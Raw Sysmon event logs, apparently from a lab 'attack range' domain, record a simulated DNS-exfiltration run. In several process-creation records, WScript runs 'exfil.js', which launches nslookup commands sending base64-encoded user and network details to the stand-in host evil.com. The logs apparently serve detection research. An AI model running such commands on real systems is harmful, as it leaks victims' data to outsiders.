14:21:31.080{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EB-629A-8B43-000000005F02}4672C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208732Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.080{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EB-629A-8B43-000000005F02}4672C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208731Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.080{2E1864BB-18EB-629A-8B43-000000005F02}46727296C:\Windows\system32\conhost.exe{2E1864BB-18EB-629A-8A43-000000005F02}1276C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208730Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.058{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-8B43-000000005F02}4672C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208729Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.058{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208728Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.058{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208727Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.058{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208726Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.058{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208725Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.058{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-8A43-000000005F02}1276C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208724Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.058{2E1864BB-18E0-629A-6742-000000005F02}39765764C:\Windows\System32\WScript.exe{2E1864BB-18EB-629A-8A43-000000005F02}1276C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208723Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.062{2E1864BB-18EB-629A-8A43-000000005F02}1276C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkese.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208722Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.058{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnrgrs.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208721Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.027{2E1864BB-18EA-629A-8843-000000005F02}68484156C:\Windows\system32\conhost.exe{2E1864BB-18EB-629A-8943-000000005F02}1188C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208720Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.027{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208719Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.027{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208718Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.027{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208717Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.027{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208716Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.027{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-8943-000000005F02}1188C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208715Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.027{2E1864BB-18EA-629A-8743-000000005F02}70726660C:\Windows\system32\cmd.exe{2E1864BB-18EB-629A-8943-000000005F02}1188C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208714Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.035{2E1864BB-18EB-629A-8943-000000005F02}1188C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EA-629A-8743-000000005F02}7072C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnrgrs.tmp 2>&1 10341000x8000000000000000208713Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.012{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EA-629A-8843-000000005F02}6848C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208712Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.012{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EA-629A-8843-000000005F02}6848C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208711Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.996{2E1864BB-18EA-629A-8843-000000005F02}68484156C:\Windows\system32\conhost.exe{2E1864BB-18EA-629A-8743-000000005F02}7072C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044800Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:31.189{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D1F5BCE3E7DD9FE103BBD4DE9AD8273,SHA256=9841F79E58208B04B9CB93ACC03C2C370DD7C2E8A005835A9605CCD585DB4203,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209329Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.981{2E1864BB-18EC-629A-D043-000000005F02}81402244C:\Windows\system32\conhost.exe{2E1864BB-18EC-629A-D143-000000005F02}3868C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209328Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.981{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209327Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.981{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209326Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.981{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-D143-000000005F02}3868C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209325Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.981{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209324Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.981{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209323Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.981{2E1864BB-18EC-629A-CF43-000000005F02}75247708C:\Windows\system32\cmd.exe{2E1864BB-18EC-629A-D143-000000005F02}3868C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209322Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.985{2E1864BB-18EC-629A-D143-000000005F02}3868C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EC-629A-CF43-000000005F02}7524C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqwt.tmp 2>&1 10341000x8000000000000000209321Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 